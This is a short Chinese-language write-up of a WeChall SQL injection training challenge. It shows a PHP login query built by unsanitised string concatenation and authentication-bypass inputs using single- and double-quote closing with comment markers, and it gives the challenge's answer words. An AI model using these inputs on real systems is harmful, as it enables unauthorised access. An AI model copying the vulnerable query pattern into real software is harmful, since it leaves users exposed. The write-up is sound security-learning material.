WeChall - CGX#10 - SQL Injection

Posted on In Views: Disqus:

Challenge

CGX#10 是 Codegeex 系列的 SQL 注入训练挑战,包含两个登录表单(mask1 / mask2),需要分别注入获取 secret word。挑战描述为 "training challenge",属于 Training / Exploit / MySQL 分类。

Solution

Problem #1

源码位于 mask1.code

1
2
3
4
5
6
7
8
$user = $_POST['username'];
$pass = md5($_POST['password']);
$query = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";
$result = mysqli_query($link, $query);
$userdata = mysqli_fetch_assoc($result);
if ($userdata) {
    echo "Welcome back, $user, Your first secret word is \"{$solution}\"";
}

单引号字符串拼接,无任何过滤。password 用 MD5 处理但不影响注入——可以在 username 中闭合引号并注释掉 password 检查:

1
2
username = admin' --
password = anything

-- 后必须有空格。登录成功后页面显示第一个 secret word:silverbullet

Problem #2

mask2.code 只有一行有效代码:

1
require 'solution2.php';

源码不可见,但测试发现改用双引号作为字符串定界符:

1
2
username = admin" OR "1"="1" --
password = anything

利用双引号闭合方式绕过。登录后显示第二个 secret word:firestarter

答案

两个 secret word 拼接后提交:

silverbulletfirestarter